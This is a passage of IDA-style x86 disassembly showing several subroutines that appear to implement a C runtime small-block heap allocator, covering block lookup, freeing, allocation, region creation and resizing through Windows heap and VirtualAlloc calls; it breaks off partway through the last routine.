; =============== S U B R O U T I N E =======================================
sub_42C82A proc near ; CODE XREF: sub_429822+45�p
; sub_431BB3+73�p ...
arg_0 = dword ptr 4
mov eax, dword_676FD4
lea ecx, [eax+eax*4]
mov eax, dword_676FD8
lea ecx, [eax+ecx*4]
loc_42C83A: ; CODE XREF: sub_42C82A+26�j
cmp eax, ecx
jnb short loc_42C852
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_42C854
add eax, 14h
jmp short loc_42C83A
; ---------------------------------------------------------------------------
loc_42C852: ; CODE XREF: sub_42C82A+12�j
xor eax, eax
locret_42C854: ; CODE XREF: sub_42C82A+21�j
retn
sub_42C82A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C855 proc near ; CODE XREF: sub_429822+54�p
; sub_431BB3+D0�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_42CB79
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_42C92B
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_42C8B9
push 3Fh
pop edx
loc_42C8B9: ; CODE XREF: sub_42C855+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_42C90D
cmp edx, 20h
jnb short loc_42C8E4
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_42C905
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42C905
; ---------------------------------------------------------------------------
loc_42C8E4: ; CODE XREF: sub_42C855+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42C905
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42C905: ; CODE XREF: sub_42C855+86�j
; sub_42C855+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_42C910
; ---------------------------------------------------------------------------
loc_42C90D: ; CODE XREF: sub_42C855+6A�j
mov ecx, [ebp+var_4]
loc_42C910: ; CODE XREF: sub_42C855+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_42C92B: ; CODE XREF: sub_42C855+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_42C939
push 3Fh
pop edx
loc_42C939: ; CODE XREF: sub_42C855+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_42C9DC
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_42C95E
mov ebx, esi
loc_42C95E: ; CODE XREF: sub_42C855+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_42C970
mov edx, esi
loc_42C970: ; CODE XREF: sub_42C855+117�j
cmp ebx, edx
jz short loc_42C9D7
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_42C9BF
cmp ebx, 20h
jnb short loc_42C9A0
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_42C9BF
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_42C9BF
; ---------------------------------------------------------------------------
loc_42C9A0: ; CODE XREF: sub_42C855+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_42C9BF
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_42C9BF: ; CODE XREF: sub_42C855+128�j
; sub_42C855+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_42C9D7: ; CODE XREF: sub_42C855+11D�j
mov esi, [ebp+arg_4]
jmp short loc_42C9DF
; ---------------------------------------------------------------------------
loc_42C9DC: ; CODE XREF: sub_42C855+ED�j
mov ebx, [ebp+arg_0]
loc_42C9DF: ; CODE XREF: sub_42C855+185�j
cmp [ebp+var_C], 0
jnz short loc_42C9ED
cmp ebx, edx
jz loc_42CA6E
loc_42C9ED: ; CODE XREF: sub_42C855+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_42CA6E
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_42CA45
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42CA34
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_42CA34: ; CODE XREF: sub_42C855+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_42CA6E
; ---------------------------------------------------------------------------
loc_42CA45: ; CODE XREF: sub_42C855+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42CA5B
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_42CA5B: ; CODE XREF: sub_42C855+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_42CA6E: ; CODE XREF: sub_42C855+192�j
; sub_42C855+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_42CB79
mov eax, dword_676FD0
test eax, eax
jz loc_42CB6B
mov ecx, dword_676FC8
mov esi, dword_437194
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; dword_437194
mov ecx, dword_676FC8
mov eax, dword_676FD0
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_676FD0
mov ecx, dword_676FC8
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_676FD0
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_676FD0
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_42CAFC
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_676FD0
loc_42CAFC: ; CODE XREF: sub_42C855+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_42CB6B
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; dword_437194
mov eax, dword_676FD0
push dword ptr [eax+10h]
push 0
push dword_676FE0
call dword_437210 ; RtlFreeHeap
mov eax, dword_676FD4
mov edx, dword_676FD8
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_676FD0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_42B9C0
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_676FD4
cmp eax, dword_676FD0
jbe short loc_42CB61
sub [ebp+arg_0], 14h
loc_42CB61: ; CODE XREF: sub_42C855+306�j
mov eax, dword_676FD8
mov dword_676FCC, eax
loc_42CB6B: ; CODE XREF: sub_42C855+234�j
; sub_42C855+2AB�j
mov eax, [ebp+arg_0]
mov dword_676FC8, edi
mov dword_676FD0, eax
loc_42CB79: ; CODE XREF: sub_42C855+38�j
; sub_42C855+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_42C855 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CB7E proc near ; CODE XREF: sub_429726+49�p
; sub_42B2CA+78�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_676FD4
mov edx, dword_676FD8
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_42CBBE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_42CBCE
; ---------------------------------------------------------------------------
loc_42CBBE: ; CODE XREF: sub_42CB7E+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_42CBCE: ; CODE XREF: sub_42CB7E+3E�j
mov eax, dword_676FCC
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_42CBF5
loc_42CBDC: ; CODE XREF: sub_42CB7E+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42CBF5
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_42CBDC
loc_42CBF5: ; CODE XREF: sub_42CB7E+5C�j
; sub_42CB7E+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_42CC73
mov ebx, edx
loc_42CBFC: ; CODE XREF: sub_42CB7E+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_42CC18
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42CC16
add ebx, 14h
jmp short loc_42CBFC
; ---------------------------------------------------------------------------
loc_42CC16: ; CODE XREF: sub_42CB7E+91�j
cmp ebx, eax
loc_42CC18: ; CODE XREF: sub_42CB7E+83�j
jnz short loc_42CC73
loc_42CC1A: ; CODE XREF: sub_42CB7E+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_42CC30
cmp dword ptr [ebx+8], 0
jnz short loc_42CC2D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_42CC1A
; ---------------------------------------------------------------------------
loc_42CC2D: ; CODE XREF: sub_42CB7E+A5�j
cmp ebx, [ebp+var_4]
loc_42CC30: ; CODE XREF: sub_42CB7E+9F�j
jnz short loc_42CC58
mov ebx, edx
loc_42CC34: ; CODE XREF: sub_42CB7E+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_42CC48
cmp dword ptr [ebx+8], 0
jnz short loc_42CC46
add ebx, 14h
jmp short loc_42CC34
; ---------------------------------------------------------------------------
loc_42CC46: ; CODE XREF: sub_42CB7E+C1�j
cmp ebx, eax
loc_42CC48: ; CODE XREF: sub_42CB7E+BB�j
jnz short loc_42CC58
call sub_42CE87
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_42CC6C
loc_42CC58: ; CODE XREF: sub_42CB7E:loc_42CC30�j
; sub_42CB7E:loc_42CC48�j
push ebx
call sub_42CF38
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_42CC73
loc_42CC6C: ; CODE XREF: sub_42CB7E+D8�j
xor eax, eax
jmp loc_42CE82
; ---------------------------------------------------------------------------
loc_42CC73: ; CODE XREF: sub_42CB7E+7A�j
; sub_42CB7E:loc_42CC18�j ...
mov dword_676FCC, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_42CC9A
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42CCD1
loc_42CC9A: ; CODE XREF: sub_42CB7E+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_42CCCE
loc_42CCB7: ; CODE XREF: sub_42CB7E+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_42CCB7
loc_42CCCE: ; CODE XREF: sub_42CB7E+137�j
mov edx, [ebp+var_4]
loc_42CCD1: ; CODE XREF: sub_42CB7E+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_42CCFA
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_42CCFA: ; CODE XREF: sub_42CB7E+16D�j
; sub_42CB7E+183�j
test ecx, ecx
jl short loc_42CD03
shl ecx, 1
inc edi
jmp short loc_42CCFA
; ---------------------------------------------------------------------------
loc_42CD03: ; CODE XREF: sub_42CB7E+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_42CD20
push 3Fh
pop esi
loc_42CD20: ; CODE XREF: sub_42CB7E+19D�j
cmp esi, edi
jz loc_42CE35
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_42CD91
cmp edi, 20h
jge short loc_42CD60
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_42CD8E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_42CD91
; ---------------------------------------------------------------------------
loc_42CD60: ; CODE XREF: sub_42CB7E+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_42CD8E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_42CD91
; ---------------------------------------------------------------------------
loc_42CD8E: ; CODE XREF: sub_42CB7E+1D6�j
; sub_42CB7E+203�j
mov ebx, [ebp+arg_0]
loc_42CD91: ; CODE XREF: sub_42CB7E+1B0�j
; sub_42CB7E+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_42CE41
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_42CE32
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_42CE03
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_42CDF1
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_42CDF1: ; CODE XREF: sub_42CB7E+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_42CE32
; ---------------------------------------------------------------------------
loc_42CE03: ; CODE XREF: sub_42CB7E+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_42CE1C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_42CE1C: ; CODE XREF: sub_42CB7E+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_42CE32: ; CODE XREF: sub_42CB7E+24E�j
; sub_42CB7E+283�j
mov ecx, [ebp+var_8]
loc_42CE35: ; CODE XREF: sub_42CB7E+1A4�j
test ecx, ecx
jz short loc_42CE44
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_42CE44
; ---------------------------------------------------------------------------
loc_42CE41: ; CODE XREF: sub_42CB7E+229�j
mov ecx, [ebp+var_8]
loc_42CE44: ; CODE XREF: sub_42CB7E+2B9�j
; sub_42CB7E+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_42CE7A
cmp ebx, dword_676FD0
jnz short loc_42CE7A
mov ecx, [ebp+var_4]
cmp ecx, dword_676FC8
jnz short loc_42CE7A
and dword_676FD0, 0
loc_42CE7A: ; CODE XREF: sub_42CB7E+2E0�j
; sub_42CB7E+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_42CE82: ; CODE XREF: sub_42CB7E+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_42CB7E endp
; =============== S U B R O U T I N E =======================================
sub_42CE87 proc near ; CODE XREF: sub_42CB7E+CC�p
mov eax, dword_676FD4
mov ecx, dword_676FC4
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_42CECA
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_676FD8
push edi
push dword_676FE0
call dword_43715C ; RtlReAllocateHeap
cmp eax, edi
jz short loc_42CF1A
add dword_676FC4, 10h
mov dword_676FD8, eax
mov eax, dword_676FD4
loc_42CECA: ; CODE XREF: sub_42CE87+11�j
mov ecx, dword_676FD8
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_676FE0
lea esi, [ecx+eax*4]
call dword_43720C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_42CF1A
push 4
push 2000h
push 100000h
push edi
call dword_437190 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_42CF1E
push dword ptr [esi+10h]
push edi
push dword_676FE0
call dword_437210 ; RtlFreeHeap
loc_42CF1A: ; CODE XREF: sub_42CE87+30�j
; sub_42CE87+67�j
xor eax, eax
jmp short loc_42CF35
; ---------------------------------------------------------------------------
loc_42CF1E: ; CODE XREF: sub_42CE87+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_676FD4
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_42CF35: ; CODE XREF: sub_42CE87+95�j
pop edi
pop esi
retn
sub_42CE87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CF38 proc near ; CODE XREF: sub_42CB7E+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_42CF4A: ; CODE XREF: sub_42CF38+19�j
test eax, eax
jl short loc_42CF53
shl eax, 1
inc ebx
jmp short loc_42CF4A
; ---------------------------------------------------------------------------
loc_42CF53: ; CODE XREF: sub_42CF38+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_42CF68: ; CODE XREF: sub_42CF38+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_42CF68
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_437190 ; VirtualAlloc
test eax, eax
jnz short loc_42CF9B
or eax, 0FFFFFFFFh
jmp loc_42D02E
; ---------------------------------------------------------------------------
loc_42CF9B: ; CODE XREF: sub_42CF38+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_42CFE1
lea eax, [edi+10h]
loc_42CFA8: ; CODE XREF: sub_42CF38+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_42CFA8
loc_42CFE1: ; CODE XREF: sub_42CF38+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_42D01E
or [eax+4], edi
loc_42D01E: ; CODE XREF: sub_42CF38+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_42D02E: ; CODE XREF: sub_42CF38+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_42CF38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D033 proc near ; CODE XREF: sub_431BB3+8F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_42D1E1
test bl, 1
jnz loc_42D1DA
add ebx, ecx
cmp esi, ebx
jg loc_42D1DA
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_42D0AA
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_42D0AA: ; CODE XREF: sub_42D033+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_42D0FA
cmp ecx, 20h
jnb short loc_42D0D6
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_42D0FA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42D0FA
; ---------------------------------------------------------------------------
loc_42D0D6: ; CODE XREF: sub_42D033+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42D0FA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42D0FA: ; CODE XREF: sub_42D033+7D�j
; sub_42D033+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_42D1C8
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_42D134
push 3Fh
pop edi
loc_42D134: ; CODE XREF: sub_42D033+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_42D1B6
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_42D18D
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_42D180
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_42D180: ; CODE XREF: sub_42D033+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_42D1B2
; ---------------------------------------------------------------------------
loc_42D18D: ; CODE XREF: sub_42D033+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_42D1A3
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_42D1A3: ; CODE XREF: sub_42D033+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_42D1B2: ; CODE XREF: sub_42D033+158�j
shr edx, cl
or [eax], edx
loc_42D1B6: ; CODE XREF: sub_42D033+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_42D1CB
; ---------------------------------------------------------------------------
loc_42D1C8: ; CODE XREF: sub_42D033+E5�j
mov edx, [ebp+arg_4]
loc_42D1CB: ; CODE XREF: sub_42D033+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_42D321
; ---------------------------------------------------------------------------
loc_42D1DA: ; CODE XREF: sub_42D033+52�j
; sub_42D033+5C�j
xor eax, eax
jmp loc_42D324
; ---------------------------------------------------------------------------
loc_42D1E1: ; CODE XREF: sub_42D033+49�j
jge loc_42D321
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_42D20C
push 3Fh
pop esi
loc_42D20C: ; CODE XREF: sub_42D033+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_42D29B
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_42D225
push 3Fh
pop esi
loc_42D225: ; CODE XREF: sub_42D033+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_42D274
cmp esi, 20h
jnb short loc_42D250
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_42D271
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42D271
; ---------------------------------------------------------------------------
loc_42D250: ; CODE XREF: sub_42D033+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42D271
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42D271: ; CODE XREF: sub_42D033+214�j
; sub_42D033+21B�j ...
mov ebx, [ebp+arg_4]
loc_42D274: ; CODE XREF: sub_42D033+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_42D29B
push 3Fh
pop esi
loc_42D29B: ; CODE XREF: sub_42D033+1DD�j
; sub_42D033+263�j
mov ecx, [ebp+var_C]
